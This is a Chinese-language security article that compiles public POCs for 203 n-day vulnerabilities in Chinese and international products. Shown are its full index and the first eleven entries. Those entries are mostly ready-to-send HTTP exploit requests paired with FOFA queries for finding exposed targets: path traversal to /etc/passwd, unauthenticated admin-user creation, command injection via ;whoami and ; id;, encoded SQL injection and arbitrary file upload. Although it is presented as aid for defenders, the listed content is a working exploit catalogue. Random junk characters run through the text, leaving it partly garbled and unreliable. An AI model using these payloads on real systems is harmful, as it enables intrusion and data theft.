互联网公开漏洞整理202309-202406% E+ T2 m0 `3 `8 N) b- j* r
道一安全 2024-06-05 07:41 北京
1 A' @" i9 Y9 u- J' K以下文章来源于网络安全新视界 ,作者网络安全新视界
7 G/ m: u1 y8 x' e' M4 Q" p; g7 d& C3 S5 ?/ \+ `- h3 G! N
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。2 u$ O$ V' |2 o: H( f _, w% o- [
3 U/ `/ e" Y2 f N漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
/ b5 C5 t0 d% f& I+ ^5 M2 l4 [6 @; W, M; V: d
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。4 K7 F0 g! Z* `& C; d
* V: t; Z/ d. K4 R+ Q8 v
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
Z2 X0 J) A+ g1 k/ I3 Q
( D- K% t. w+ a) m' {& U P( K合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。2 Y' y# S; K- i: R
4 _2 m7 ?' M4 l \+ j r
' E, L5 P- u3 P' J- \& q- P声明
: ~0 c8 |0 j' _2 a+ m; e) D b$ D- i4 A2 o5 G) q% t" `: ]. C
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。1 i7 ?- J* }- |" j1 Y
6 K" u4 ]) @. S$ r8 o9 P5 o! {
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
; w4 k# I4 x/ V% Q$ g; h2 c% T* I2 K
! c H! J1 N* }! l6 C6 h+ H+ z
! X! k( H3 A" q! b目录; [0 c K$ v3 u. r- V
4 B' l6 ?6 @- K$ W' v; ]01
/ g' w, U; A1 Y7 J: R$ m8 \/ {# `
/ L- S% o/ d. C4 t* A0 ~# F# H1. StarRocks MPP数据库未授权访问
1 ^$ a( y3 l3 m. E2 M9 v2. Casdoor系统static任意文件读取
! {% ^* H7 I1 i3. EasyCVR智能边缘网关 userlist 信息泄漏
* f' H. k& F' D3 X4. EasyCVR视频管理平台存在任意用户添加
) k3 w0 b. m2 ~2 {" @( P# v4 n% r5. NUUO NVR 视频存储管理设备远程命令执行
& W' D5 D, |) q+ t0 A. v- o6. 深信服 NGAF 任意文件读取1 ^2 ^8 q3 U e1 a' _
7. 鸿运主动安全监控云平台任意文件下载: @/ t' Z0 H! v6 ^- ]% X
8. 斐讯 Phicomm 路由器RCE
0 @. @5 s% H/ r& B; J% t/ I9. 稻壳CMS keyword 未授权SQL注入
! V( v& G# H ?$ X10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
( Q# x# u7 A T. Q& H11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入0 w. e1 s( A" n& n2 N- t
12. Jorani < 1.0.2 远程命令执行* W/ |8 V3 W0 f# g5 ]
13. 红帆iOffice ioFileDown任意文件读取
: T/ E! T4 i9 S* }14. 华夏ERP(jshERP)敏感信息泄露
* a2 u1 L& R9 F, _; i& W% O15. 华夏ERP getAllList信息泄露- M7 _1 a0 |8 i; U. D* z
16. 红帆HFOffice医微云SQL注入
$ ]5 W- s6 I+ b7 r17. 大华 DSS itcBulletin SQL 注入1 W( u+ T. C! T0 |
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露- v5 T8 j" N% Y$ N% g
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
; m+ x" N& h' b% H; i% m& u20. 大华ICC智能物联综合管理平台任意文件读取) Y7 [6 }3 o- l9 f, |
21. 大华ICC智能物联综合管理平台random远程代码执行
8 `$ ^, E- R( Q( X& [5 q- j22. 大华ICC智能物联综合管理平台 log4j远程代码执行
8 A! M" ` k9 Y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 U8 Q) I( T+ ~1 Z/ L- K$ x w
24. 用友NC 6.5 accept.jsp任意文件上传
$ X3 |7 l g' M% h9 }! n% i25. 用友NC registerServlet JNDI 远程代码执行
4 C/ P" T7 x- n8 ~26. 用友NC linkVoucher SQL注入* d( X6 x7 o9 l: |" M6 V& v( K
27. 用友 NC showcontent SQL注入$ n4 ~. V3 L' K; s
28. 用友NC grouptemplet 任意文件上传3 {0 Y3 x( `" X
29. 用友NC down/bill SQL注入
& m# T S6 ]. l30. 用友NC importPml SQL注入
8 r" e5 g- W7 U/ I- z* c# ~8 u6 Y31. 用友NC runStateServlet SQL注入
, j1 ^+ I# l5 ^! H* R32. 用友NC complainbilldetail SQL注入
5 w5 a# _1 [: H& ^1 Y1 R33. 用友NC downTax/download SQL注入
8 [+ k. R! O7 |( b4 |; f9 m) X34. 用友NC warningDetailInfo接口SQL注入
, g! l( k" x% ~5 [4 G* Q35. 用友NC-Cloud importhttpscer任意文件上传
" N3 Y! Y* h& ?6 M/ p36. 用友NC-Cloud soapFormat XXE, Y" v W/ p* C( u# g6 s8 W
37. 用友NC-Cloud IUpdateService XXE
; \- n2 n# M [9 |! l4 I38. 用友U8 Cloud smartweb2.RPC.d XXE
5 J) ?1 v2 t, \" E+ M+ k3 k' a39. 用友U8 Cloud RegisterServlet SQL注入 R1 H4 v m- |0 ^8 |
40. 用友U8-Cloud XChangeServlet XXE. T" g, M2 j- W
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% g P* b2 R8 r42. 用友GRP-U8 SmartUpload01 文件上传
+ [. C! n2 e; |7 ~7 G& [+ b43. 用友GRP-U8 userInfoWeb SQL注入致RCE9 {# V+ K6 y Q# m4 _( O: A' Q
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. a4 ~, W% D5 p+ k3 e- E) i3 l0 P7 c45. 用友GRP-U8 ufgovbank XXE
. h4 a) Q$ s( X4 P; N/ S0 a46. 用友GRP-U8 sqcxIndex.jsp SQL注入3 g: C2 V0 ]: H9 l
47. 用友GRP A++Cloud 政府财务云 任意文件读取" k l: c( U0 \
48. 用友U8 CRM swfupload 任意文件上传5 ^) L( N' \: _; L; B
49. 用友U8 CRM系统uploadfile.php接口任意文件上传' c1 }( \* Q5 p8 ~5 x9 F
50. QDocs Smart School 6.4.1 filterRecords SQL注入
/ d9 N+ ]! S5 `& E' @! t i51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入& M2 v( P# d+ n2 ]1 _9 H
52. 泛微E-Office json_common.php sql注入
6 j7 `! K( y# l' R3 x7 b I53. 迪普 DPTech VPN Service 任意文件上传1 U+ I3 ~7 H4 |
54. 畅捷通T+ getstorewarehousebystore 远程代码执行# N9 l) m" P0 m6 t; p; O
55. 畅捷通T+ getdecallusers信息泄露 Q( z0 c# h5 u8 _, [2 l2 ~3 c
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" ]2 g1 q: x+ j3 o+ L+ J
57. 畅捷通T+ keyEdit.aspx SQL注入; Z* B x; p& H3 V& u# L
58. 畅捷通T+ KeyInfoList.aspx sql注入
$ t% v- m9 K8 _1 O3 z/ {59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ J! f% z0 q5 [, ?$ x! `60. 百卓Smart管理平台 importexport.php SQL注入
& {$ ]% x+ F0 V5 E4 y3 x61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 B1 j2 c1 ^2 m
62. IP-guard WebServer 远程命令执行
8 j; Q" v% v* l8 q63. IP-guard WebServer任意文件读取% c9 ?8 v! B3 p
64. 捷诚管理信息系统CWSFinanceCommon SQL注入 b/ t' O; D( q6 T. F+ w8 N* O1 r
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
5 F0 x& S% L4 |3 y66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入- w$ `8 [4 L+ O! L& O: m: }( @
67. 万户ezOFFICE wpsservlet任意文件上传
1 m: B P- W2 S$ U% m68. 万户ezOFFICE wf_printnum.jsp SQL注入
! @! `. a! N$ _+ V q69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 f9 h2 q* }7 O8 A70. 万户ezEIP success 命令执行& q3 G5 f; p( M1 L
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ j! v' J+ S6 J# C72. 致远OA getAjaxDataServlet XXE* i& w" O; O7 I; Y( n
73. GeoServer wms远程代码执行
, l0 r8 t1 o4 r; Q& V8 K74. 致远M3-server 6_1sp1 反序列化RCE7 v3 i; b( N& O( h' ]$ m
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: w6 q( L/ S5 H2 @
76. 新开普掌上校园服务管理平台service.action远程命令执行! m Z# G' G4 B0 L1 N- n
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
4 S4 ]5 [/ M) h) m' S% {, r78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
1 ^ f+ h) E) V# X Y79. BYTEVALUE 百为流控路由器远程命令执行
$ M: B( x9 u. W' q* O80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" @( B. a% @# L# X% j3 g$ d
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: L* c% S. o: } B82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
0 W0 {4 x% P( \: \4 J# n# [0 X83. JeecgBoot testConnection 远程命令执行8 q* i0 X2 L/ E' o. n: S
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 U. b, G- o4 `- ]: u1 e& h v
85. SysAid On-premise< 23.3.36远程代码执行& E+ q; i" _$ Z
86. 日本tosei自助洗衣机RCE
# r% m1 C, f$ [5 t87. 安恒明御安全网关aaa_local_web_preview文件上传 y; q& A% e- D: k; S
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ B; M% @& L, d89. 致远互联FE协作办公平台editflow_manager存在sql注入
, ]* D! b, ~, D90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& R4 I1 p5 [2 s4 [
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: r9 C+ j* \; D. N! q% e
92. 海康威视运行管理中心session命令执行
' ?; M! Z- y# ?- K8 k93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! V4 H3 @4 j4 E1 u94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- Y# i- }; A7 e2 x/ ]
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
1 M. T l e/ |* f- u96. Apache OFBiz 18.12.11 groovy 远程代码执行0 T0 S& o. w" i/ p
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ O9 K) G) a0 \4 c+ c98. SpiderFlow爬虫平台远程命令执行 s H- q$ F+ G& H0 r! o7 U( ~, r- i% G/ J
99. Ncast盈可视高清智能录播系统busiFacade RCE/ U" @# I; l7 d& n3 O6 f
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传8 j# W5 `9 H( p! P
101. ivanti policy secure-22.6命令注入
0 `, u2 R2 V& p3 J1 e0 e( j102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行5 H( w; @6 ?! B: | V
103. Ivanti Pulse Connect Secure VPN XXE
4 ^1 x9 A. w4 _" S6 t; P104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
z1 Q Z8 W% {( r7 e105. SpringBlade v3.2.0 export-user SQL 注入0 F6 v4 g4 G) e& S
106. SpringBlade dict-biz/list SQL 注入# R0 y; k/ R% z* A- |1 O& Z
107. SpringBlade tenant/list SQL 注入
U- w9 @% \3 d5 p+ ?3 p108. D-Tale 3.9.0 SSRF
5 J! {7 @3 b& _109. Jenkins CLI 任意文件读取
8 Q3 C+ a2 `& ]( y6 O) h' q110. Goanywhere MFT 未授权创建管理员. [5 ^0 s" ?( c' U
111. WordPress Plugin HTML5 Video Player SQL注入
# [; |( O. G# d! n112. WordPress Plugin NotificationX SQL 注入
3 L3 n) v5 m. f8 n/ M113. WordPress Automatic 插件任意文件下载和SSRF
0 n" [3 e% d4 S: R114. WordPress MasterStudy LMS插件 SQL注入% U4 x# K- ^6 b. b j6 _
115. WordPress Bricks Builder <= 1.9.6 RCE
0 [; o1 K0 }/ S i1 |116. wordpress js-support-ticket文件上传! A, A: Z& K* P$ f: C0 L4 @
117. WordPress LayerSlider插件SQL注入$ W3 k# c+ H0 p' ^( ?6 ^& D/ T2 E c
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
" V3 }" ]% c7 _! g- H/ f: O119. 北京百绰智能S20后台sysmanageajax.php sql注入: d) ^9 t+ `* O' @ x0 y' l
120. 北京百绰智能S40管理平台导入web.php任意文件上传6 Y" e% ]1 N; [/ \5 c: j+ ]* P/ R
121. 北京百绰智能S42管理平台userattestation.php任意文件上传& W/ ]) w' j( `* @) l
122. 北京百绰智能s200管理平台/importexport.php sql注入
9 n- z* R8 N7 r/ m$ l3 |: e; d( m v123. Atlassian Confluence 模板注入代码执行
& ^; B$ V- s6 Z3 Q( ?! |! s* |124. 湖南建研工程质量检测系统任意文件上传% ]" K( T" M" _9 t/ I
125. ConnectWise ScreenConnect身份验证绕过
6 B5 R! D' B$ d9 n& H; _126. Aiohttp 路径遍历: }2 T7 N, O' t" J& B1 _' B
127. 广联达Linkworks DataExchange.ashx XXE
( n) C) |1 v* J2 w6 T+ N% I% ]128. Adobe ColdFusion 反序列化# y1 M7 {' q5 g/ i5 X, \
129. Adobe ColdFusion 任意文件读取. u4 @' `1 D. y. l8 T0 r
130. Laykefu客服系统任意文件上传5 N! i) X- g% K6 e* o
131. Mini-Tmall <=20231017 SQL注入! N+ C. M8 {6 H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
x% ~4 y. P- X% Z2 I133. H5 云商城 file.php 文件上传
% l, i# G" i; o, X134. 网康NS-ASG应用安全网关index.php sql注入/ p9 @$ S- P& H: L4 Y
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 g% ~9 t' {6 s$ k1 s0 s2 z5 g; w136. NextChat cors SSRF3 E" q! m0 }1 w" i
137. 福建科立迅通信指挥调度平台down_file.php sql注入
, E! k, [8 t. P* Q+ [138. 福建科立讯通信指挥调度平台pwd_update.php sql注入- m% c6 |- ^2 q* x- P
139. 福建科立讯通信指挥调度平台editemedia.php sql注入# r# ~7 l9 P1 A) G
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 E! B6 S, k& [% g
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入2 U. R( W. w) V, c
142. CMSV6车辆监控平台系统中存在弱密码( t6 N9 `0 `. [
143. Netis WF2780 v2.1.40144 远程命令执行- }% P( c+ s' M4 ~2 v6 C
144. D-Link nas_sharing.cgi 命令注入1 l8 g1 x3 D" Q$ y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
1 F4 l, ?! r; |6 y146. MajorDoMo thumb.php 未授权远程代码执行2 }. J+ c1 A% o$ i
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
3 u$ |; l( g: K148. CrushFTP 认证绕过模板注入5 N1 D2 l7 p; p% U }
149. AJ-Report开源数据大屏存在远程命令执行+ _$ |6 A7 i: t# E2 ]3 z2 @" w/ V
150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 h+ `2 a6 w2 F0 ? [7 Z% m B151. AJ-Report 1.4.1 pageList sql注入% v" I8 Z" `- Q. V$ f; C; {
152. Progress Kemp LoadMaster 远程命令执行# [' u( s! l% X% M% a' F
153. gradio任意文件读取# J* v- O4 Q# N/ o F
154. 天维尔消防救援作战调度平台 SQL注入
! B9 J/ ]) J* [1 ]/ e155. 六零导航页 file.php 任意文件上传
/ Q) j2 R3 V- F/ S' B: g156. TBK DVR-4104/DVR-4216 操作系统命令注入: K+ U, M+ c/ P% E8 j
157. 美特CRM upload.jsp 任意文件上传
* }9 _5 m/ J; s; z% }. R158. Mura-CMS-processAsyncObject存在SQL注入
$ h8 d- |2 g' \& K. y159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传/ ^' w3 w2 ]# ~8 \; f8 R
160. Sonatype Nexus Repository 3目录遍历与文件读取" M) {4 i7 Z5 z* I3 k2 b
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传' z1 A. k: d( N( p# s
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* a. U0 `+ ]/ }$ `; g( T* G
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; f, N L) l" j! M5 Z164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
5 J# y/ R0 ?8 B8 Z! A7 ?165. OrangeHRM 3.3.3 SQL 注入0 u6 J6 u* C4 P; E' V% K
166. 中成科信票务管理平台SeatMapHandler SQL注入
3 |3 _7 A, [4 w3 T4 J5 c& R* M3 o' |167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 u8 _( K! V& c% t# @168. 宏景EHR OutputCode 任意文件读取) c( { S' I6 ^/ o# h& x& `5 v
169. 宏景EHR downlawbase SQL注入
& s9 ~# z3 F0 Y) s* d+ u170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) h P, Q( b: S- F* l$ @( `; T171. 通天星CMSV6车载定位监控平台 SQL注入
* `/ n% p3 Z, x `172. DT-高清车牌识别摄像机任意文件读取+ ~( F" G% r% ?1 d
173. Check Point 安全网关任意文件读取
' c5 O U8 U7 g174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 O% X* o' u0 s# k: m
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
0 `) u5 l1 M. i5 E: N176. 电信网关配置管理系统 rewrite.php 文件上传
4 {' |$ g% n# t z* N177. H3C路由器敏感信息泄露
2 L6 J5 i: @& W4 A4 C8 i178. H3C校园网自助服务系统-flexfileupload-任意文件上传
* n4 Z8 D0 A9 N8 Z5 ]179. 建文工程管理系统存在任意文件读取1 z4 s7 k5 k/ @& d
180. 帮管客 CRM jiliyu SQL注入& y0 {# T0 r. ]- {! i8 e
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入5 |; S+ s! F/ L/ r& J
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* v- X3 @/ a( B6 T. c
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
5 L/ } R \* {2 p6 X184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 d% M1 M* A0 Y: V* X
185. 瑞友天翼应用虚拟化系统SQL注入$ O1 M5 o! ]9 z; b
186. F-logic DataCube3 SQL注入
6 a! Q9 c" v# N0 v/ @187. Mura CMS processAsyncObject SQL注入
: ]. n, s8 J% r188. 叁体-佳会视频会议 attachment 任意文件读取
2 W- L) I9 { b) B/ g189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( [! e. T8 O- ~% K& |' e190. 短视频矩阵营销系统 poihuoqu 任意文件读取
) X! q% e8 L' J* I191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
; ~6 |3 r' R, G5 A192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
2 ~) q) ?$ [6 Y4 q193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行" T) h! I: t( { S- E
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
, X* ?: n; l+ k4 G& z* [/ @2 {195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
- x3 {# H) H9 y* W: ~196. 河南省风速科技统一认证平台密码重置2 K/ `9 F, o# o" T: M6 d
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ w; }/ f$ |0 _" [+ |# d
198. 阿里云盘 WebDAV 命令注入1 R5 Y% V' S, ]# Z3 r+ q* d$ T
199. cockpit系统assetsmanager_upload接口 文件上传
5 b$ n, {; {% o$ Y200. SeaCMS海洋影视管理系统dmku SQL注入
% _' v w/ n: M: a# o9 _7 F9 _201. 方正全媒体新闻采编系统 binary SQL注入$ o6 F2 c4 z1 y. t" y* L
202. 微擎系统 AccountEdit任意文件上传
9 s. }. a, d8 _1 l# ^203. 红海云EHR PtFjk 文件上传
7 }. P7 g; h1 W3 S" o8 I% O+ O+ F5 F$ O7 b
POC列表
, P$ K$ u& f# k) k1 {* p2 t+ V+ _* |: z
020 B; K1 E% s+ w( y' E! Q8 Z
6 z8 W- |0 D- }: e1 P y1. StarRocks MPP数据库未授权访问
4 p9 p8 ~1 f4 B# l( LFOFA :title="StarRocks"
: S% w) V- {; O7 u, aGET /mem_tracker HTTP/1.1
0 f( @/ V. j) Q! tHost: URL2 W* J5 e' v8 s5 e
) }) x/ |: U- k. a Y O, a& e
2 M2 N) g) F# l: ^9 a# q
2. Casdoor系统static任意文件读取
' R& x5 o7 ?1 A2 A1 I* x) B8 eFOFA :title="Casdoor"
* K+ J7 I0 r8 G7 C' K7 MGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: ^7 A& Z8 q; x. k8 p: cHost: xx.xx.xx.xx:9999
6 _8 s1 e& ?. M3 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 v. ~4 R3 H6 c
Connection: close$ k; V" X" y! I4 g6 I
Accept: */*+ M. T$ H' o" ?
Accept-Language: en& v5 B6 l& u% ~7 ]' ~: f8 W; S @
Accept-Encoding: gzip
; a+ z: W" a# O" |9 O1 W% y" C1 {
* C/ w& y x2 w1 ?2 t) J% U; N/ V, h5 F: H% Q
3. EasyCVR智能边缘网关 userlist 信息泄漏' p4 e) L1 J) z1 z/ D! F
FOFA :title="EasyCVR"
: x8 s) B6 z$ Q& X+ {7 H8 ?GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1# v G/ j2 w Z$ I2 D# E$ M, i G
Host: xx.xx.xx.xx
/ a7 X4 T- e- S! \) Z. o y
: h7 i, C, M0 Q( T( k& p1 ?" t% U$ G; l0 o# J; Q
4. EasyCVR视频管理平台存在任意用户添加
& l% g2 \) c6 I H n& WFOFA :title="EasyCVR"
5 Y+ r6 U& i* L5 F/ Q% {
( o+ A3 S+ n% J5 n/ w6 ~+ jpassword更改为自己的密码md50 k" t8 B& K' V9 Q; r+ b
POST /api/v1/adduser HTTP/1.1' P' k! \3 W) E2 m7 y" x
Host: your-ip4 r. J9 Q+ a3 b) e& C5 V
Content-Type: application/x-www-form-urlencoded; charset=UTF-8! U; Z4 s( e N8 c! d) F7 c
' L1 @" w3 u" u1 T) ]) L: o/ |$ g1 `name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
* L0 |( o( @3 c: q: t) y& A: |5 w6 \# ?( o: |( i! D
, F, R* n) ^' x: }5. NUUO NVR 视频存储管理设备远程命令执行
9 N5 y7 x, @, n8 sFOFA:title="Network Video Recorder Login"; Z2 x, Y/ z4 A
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" S; D3 t2 h( n* j9 ?+ O9 K
Host: xx.xx.xx.xx! p3 m6 A) e1 i4 } _
. Z8 E2 L. M! E
6 Q* [ X: E; O/ q8 B2 |. o; r+ ~
6. 深信服 NGAF 任意文件读取1 S/ J. T, z/ ? ]8 p: Z( d, z# Z! m& w
FOFA:title="SANGFOR | NGAF"
5 T( H: o9 U8 d6 h! rGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.11 `6 j0 r8 g; G0 H& v7 J- O: ?
Host:
# V2 @; y+ N0 A% V6 N1 O! ^& v7 V+ C& ~* s8 a
0 s5 ^+ D/ W) x7. 鸿运主动安全监控云平台任意文件下载/ N. G4 ?3 }: z/ S
FOFA:body="./open/webApi.html"
# Z; b/ z8 o1 }0 t7 gGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
N9 {5 B+ ^% |# A6 fHost:) A4 [) k, D' {, ]; O
0 T' V; ^& c! B3 V: I% y/ R; Z/ `! X, M' X8 L; M9 R
8. 斐讯 Phicomm 路由器RCE
! K: s: v% |2 [. cFOFA:icon_hash="-1344736688"
0 H/ a; [7 a9 u6 ~3 g; |4 m9 D默认账号admin登录后台后,执行操作
/ B. ?- ]6 `3 @- IPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
! W: u% B: k6 BHost: x.x.x.x
1 N* k$ B% K) `# @+ `Cookie: sysauth=第一步登录获取的cookie6 i& f8 h9 j6 U8 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
1 p# h- E- u V2 J6 B# {9 m+ d) gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 G1 _9 Y- b* @1 l) V! f* g; }4 B2 E0 E
! {9 i8 A9 {- J: f- S" c
------WebKitFormBoundaryxbgjoytz* }% l4 }1 t. u$ Y0 l! A
Content-Disposition: form-data; name="wifiRebootEnablestatus". h; C2 x0 ]6 O' _% V. [! Q8 k
& h# H# t2 M& H5 y+ O
%s8 _% M+ P4 S% w8 }' R+ n* ~
------WebKitFormBoundaryxbgjoytz6 s }5 f7 N/ P4 [( u
Content-Disposition: form-data; name="wifiRebootrange"
* ^9 r' y9 l, L( Q& N- w k; E* _) g0 t1 z2 j0 N
12:00; id;& ?3 i% y, u5 q4 h8 [
------WebKitFormBoundaryxbgjoytz
4 m+ b3 m# S6 F( U$ S+ {4 v# D9 CContent-Disposition: form-data; name="wifiRebootendrange": G" R6 A, r1 I: R' ^( e" B
- [1 \6 H0 W" h, ?%s:
' X% e; Z) C' J. s------WebKitFormBoundaryxbgjoytz
" b" h% i' G( c# m0 q6 mContent-Disposition: form-data; name="cururl2"# F( n2 B3 Z3 ?1 u% W0 ]* S
4 w7 [; N9 x. t, i. x9 w; X8 h5 c2 t% k/ ]
------WebKitFormBoundaryxbgjoytz--* m9 a4 }# {6 ^9 ^
! H8 o" c' X6 R$ A( X/ m
9 ?0 g. J) I2 I: u9. 稻壳CMS keyword 未授权SQL注入 U- l1 P4 G3 [: `( U
FOFA:app="Doccms"5 v0 h/ D: f- D' u, ]
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
( a" L* k) K" [Host: x.x.x.x
% K2 c" A1 o( K6 ~0 N( V" z. y2 Q9 d0 t; I3 J
" E* I- ?3 D, a6 I6 x+ lpayload为下列语句的二次Url编码! S0 |/ t9 _7 v
2 J8 t( q) [* s5 U$ F% Y+ K' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
: ~; H5 f5 \; S' t# m8 i8 N, M. g/ c7 a j* H1 e- X6 U6 M0 j
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
2 \2 i( P6 ]$ a4 ?FOFA:icon_hash="953405444") s- z1 `3 R; e% v5 ]
2 ?6 j8 f+ c3 A% j5 p. w" L. ]+ X/ p文件上传后响应中包含上传文件的路径# F. @" e5 L& K$ Y- T
POST /eis/service/api.aspx?action=saveImg HTTP/1.1. p) M8 i. ~1 X/ E4 J% L
Host: x.x.x.x:xx
# B: ?, k8 t8 b- e( N$ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 O5 d! [1 k1 [Content-Length: 197
. e" U$ i/ U( ]+ s8 ~" eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% i! u4 x: S7 e9 ?1 p: J6 \) R
Accept-Encoding: gzip, deflate
$ t/ H! i8 b; W7 zAccept-Language: zh-CN,zh;q=0.92 W$ O% Y' V6 ~' w! B- X
Connection: close+ B, V& Q: P3 n" j9 q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu1 K9 i. P# p% u
8 s3 [( _, s" b6 `7 m& z- S
------WebKitFormBoundaryxdgaqmqu
) q/ L6 {2 X. E4 Z7 RContent-Disposition: form-data; name="file"filename="icfitnya.txt"
' E& V4 B- h& S4 T8 {' BContent-Type: text/html
; S% G5 o/ M- {2 P6 `4 F% G4 F: c7 m/ F0 K
jmnqjfdsupxgfidopeixbgsxbf
" ?& j- Q0 w+ t. Y C. S' _------WebKitFormBoundaryxdgaqmqu--
9 a4 E- Y$ e u( p2 o& p# d
) ~6 \! ~. r( r- h) ]4 E) ^8 }- S6 o- K/ Z# y i+ Z" M
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
$ H( A* ?) N0 K- t+ _+ F, w. OFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
- m4 e% c1 X @6 [- xGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1) M4 ^4 _; ~. \! m
Host: 127.0.0.1
; ]8 u8 M; T- Y) z1 y/ K; m% |) oPragma: no-cache
* g. E9 K$ M* ~, ~- XCache-Control: no-cache
